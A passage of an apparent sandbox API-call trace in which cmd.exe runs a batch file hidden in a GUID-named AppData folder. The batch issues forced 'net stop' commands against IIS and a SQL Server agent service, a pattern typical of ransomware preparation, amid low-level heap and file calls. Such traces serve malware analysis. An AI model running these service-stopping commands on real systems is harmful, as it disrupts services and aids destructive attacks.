lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop IISAdmin /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop IISAdmin /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xbac, dwThreadId=0xbbc)) returned 1 [0205.741] CloseHandle (hObject=0x78) returned 1 [0205.741] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0205.741] GetProcessHeap () returned 0x3e0000 [0205.741] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.741] GetEnvironmentStringsW () returned 0x3f8408* [0205.741] GetProcessHeap () returned 0x3e0000 [0205.741] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.741] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.741] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0205.872] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0205.872] CloseHandle (hObject=0x74) returned 1 [0205.872] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0205.873] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0205.873] GetProcessHeap () returned 0x3e0000 [0205.873] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.873] GetEnvironmentStringsW () returned 0x3f8408* [0205.873] GetProcessHeap () returned 0x3e0000 [0205.873] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.873] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.873] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0205.873] GetProcessHeap () returned 0x3e0000 [0205.873] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.873] GetEnvironmentStringsW () returned 0x3f8408* [0205.873] GetProcessHeap () returned 0x3e0000 [0205.873] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.874] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.874] GetProcessHeap () returned 0x3e0000 [0205.874] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0205.874] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0205.874] _get_osfhandle (_FileHandle=1) returned 0x264 [0205.874] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0205.874] _get_osfhandle (_FileHandle=1) returned 0x264 [0205.874] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0205.874] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0205.874] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0205.874] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0205.874] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0205.875] SetConsoleInputExeNameW () returned 0x1 [0205.875] GetConsoleOutputCP () returned 0x1b5 [0205.875] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0205.875] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.875] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0205.875] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0205.875] _get_osfhandle (_FileHandle=3) returned 0x74 [0205.875] SetFilePointer (in: hFile=0x74, lDistanceToMove=3991, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf97 [0205.875] GetProcessHeap () returned 0x3e0000 [0205.875] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0205.875] GetProcessHeap () returned 0x3e0000 [0205.875] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0205.875] GetProcessHeap () returned 0x3e0000 [0205.875] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0205.875] GetProcessHeap () returned 0x3e0000 [0205.875] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0205.875] GetProcessHeap () returned 0x3e0000 [0205.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0205.938] GetProcessHeap () returned 0x3e0000 [0205.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0205.938] GetProcessHeap () returned 0x3e0000 [0205.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0205.938] GetProcessHeap () returned 0x3e0000 [0205.939] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0205.939] GetProcessHeap () returned 0x3e0000 [0205.939] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0205.939] GetProcessHeap () returned 0x3e0000 [0205.939] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0205.939] GetProcessHeap () returned 0x3e0000 [0205.939] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0205.939] GetProcessHeap () returned 0x3e0000 [0205.939] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0205.939] GetProcessHeap () returned 0x3e0000 [0205.939] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0205.939] _get_osfhandle (_FileHandle=3) returned 0x74 [0205.939] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf97 [0205.939] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x92a, lpOverlapped=0x0) returned 1 [0205.939] SetFilePointer (in: hFile=0x74, lDistanceToMove=4026, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfba [0205.939] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=35, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$PRACTTICEMGT /y\r\n\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 35 [0205.940] _get_osfhandle (_FileHandle=3) returned 0x74 [0205.940] GetFileType (hFile=0x74) returned 0x1 [0205.940] _get_osfhandle (_FileHandle=3) returned 0x74 [0205.940] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfba [0205.940] GetProcessHeap () returned 0x3e0000 [0205.940] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0205.940] GetProcessHeap () returned 0x3e0000 [0205.940] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0205.943] _tell (_FileHandle=3) returned 4026 [0205.943] _close (_FileHandle=3) returned 0 [0205.943] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0205.943] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0205.943] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0205.943] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0205.944] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0205.944] _wcsicmp (_String1="net", _String2="CD") returned 11 [0205.944] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0205.944] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0205.944] _wcsicmp (_String1="net", _String2="REN") returned -4 [0205.944] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0205.944] _wcsicmp (_String1="net", _String2="SET") returned -5 [0205.944] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0205.944] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0205.944] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0205.944] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0205.944] _wcsicmp (_String1="net", _String2="MD") returned 1 [0205.944] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0205.944] _wcsicmp (_String1="net", _String2="RD") returned -4 [0205.944] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0205.944] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0205.944] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0205.944] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0205.944] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0205.944] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0205.944] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0205.944] _wcsicmp (_String1="net", _String2="VER") returned -8 [0205.944] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0205.944] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0205.944] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0205.944] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0205.944] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0205.944] _wcsicmp (_String1="net", _String2="START") returned -5 [0205.944] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0205.944] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0205.944] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0205.944] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0205.944] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0205.944] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0205.944] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0205.944] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0205.944] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0205.944] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0205.945] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0205.945] SetErrorMode (uMode=0x0) returned 0x1 [0205.945] GetProcessHeap () returned 0x3e0000 [0205.945] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0205.945] GetProcessHeap () returned 0x3e0000 [0205.945] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0205.945] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.945] GetProcessHeap () returned 0x3e0000 [0205.945] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0205.945] GetProcessHeap () returned 0x3e0000 [0205.946] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0205.946] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0205.946] GetProcessHeap () returned 0x3e0000 [0205.946] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0205.946] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.946] GetProcessHeap () returned 0x3e0000 [0205.946] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0205.946] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0205.946] GetProcessHeap () returned 0x3e0000 [0205.946] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0205.947] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.947] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.947] GetLastError () returned 0x2 [0205.948] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.948] GetLastError () returned 0x2 [0205.948] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.948] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0205.949] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.949] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.949] GetLastError () returned 0x2 [0205.949] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0205.950] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.950] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.951] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0205.951] SetErrorMode (uMode=0x0) returned 0x1 [0205.951] GetProcessHeap () returned 0x3e0000 [0205.951] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0205.951] GetProcessHeap () returned 0x3e0000 [0205.951] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0205.951] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.951] GetProcessHeap () returned 0x3e0000 [0205.951] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0205.951] GetProcessHeap () returned 0x3e0000 [0205.951] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0205.952] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0205.952] GetProcessHeap () returned 0x3e0000 [0205.952] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0205.952] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.952] GetProcessHeap () returned 0x3e0000 [0205.952] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0205.952] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0205.952] GetProcessHeap () returned 0x3e0000 [0205.952] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0205.952] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.953] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.953] GetLastError () returned 0x2 [0205.953] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.953] GetLastError () returned 0x2 [0205.954] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.954] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0205.954] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0205.955] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.955] GetLastError () returned 0x2 [0205.955] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0205.955] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0205.956] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.956] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0205.956] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0205.956] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0205.956] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0205.957] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$PRACTTICEMGT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$PRACTTICEMGT /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$PRACTTICEMGT /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xbec, dwThreadId=0xbfc)) returned 1 [0205.960] CloseHandle (hObject=0x74) returned 1 [0205.960] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0205.960] GetProcessHeap () returned 0x3e0000 [0205.960] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.960] GetEnvironmentStringsW () returned 0x3f8408* [0205.961] GetProcessHeap () returned 0x3e0000 [0205.961] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.961] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.961] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0206.090] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0206.090] CloseHandle (hObject=0x78) returned 1 [0206.090] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0206.090] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0206.090] GetProcessHeap () returned 0x3e0000 [0206.090] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.091] GetEnvironmentStringsW () returned 0x3f8408* [0206.091] GetProcessHeap () returned 0x3e0000 [0206.091] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.091] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.091] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0206.091] GetProcessHeap () returned 0x3e0000 [0206.091] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.091] GetEnvironmentStringsW () returned 0x3f8408* [0206.091] GetProcessHeap () returned 0x3e0000 [0206.091] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.091] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.092] GetProcessHeap () returned 0x3e0000 [0206.092] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0206.092] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0206.092] _get_osfhandle (_FileHandle=1) returned 0x264 [0206.092] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0206.092] _get_osfhandle (_FileHandle=1) returned 0x264 [0206.092] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0206.092] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0206.092] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0206.092] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0206.092] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0206.092] SetConsoleInputExeNameW () returned 0x1 [0206.092] GetConsoleOutputCP () returned 0x1b5 [0206.093] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0206.093] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.093] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0206.093] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0206.093] _get_osfhandle (_FileHandle=3) returned 0x78 [0206.093] SetFilePointer (in: hFile=0x78, lDistanceToMove=4026, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfba [0206.093] GetProcessHeap () returned 0x3e0000 [0206.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0206.093] GetProcessHeap () returned 0x3e0000 [0206.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0206.093] GetProcessHeap () returned 0x3e0000 [0206.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0206.093] GetProcessHeap () returned 0x3e0000 [0206.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0206.093] GetProcessHeap () returned 0x3e0000 [0206.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0206.093] GetProcessHeap () returned 0x3e0000 [0206.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0206.093] GetProcessHeap () returned 0x3e0000 [0206.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0206.093] GetProcessHeap () returned 0x3e0000 [0206.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0206.093] GetProcessHeap () returned 0x3e0000 [0206.094] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0206.094] GetProcessHeap () returned 0x3e0000 [0206.094] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0206.094] GetProcessHeap () returned 0x3e0000 [0206.094] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0206.094] GetProcessHeap () returned 0x3e0000 [0206.094] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0206.094] GetProcessHeap () returned 0x3e0000 [0206.094] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0206.094] _get_osfhandle (_FileHandle=3) returned 0x78 [0206.094] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 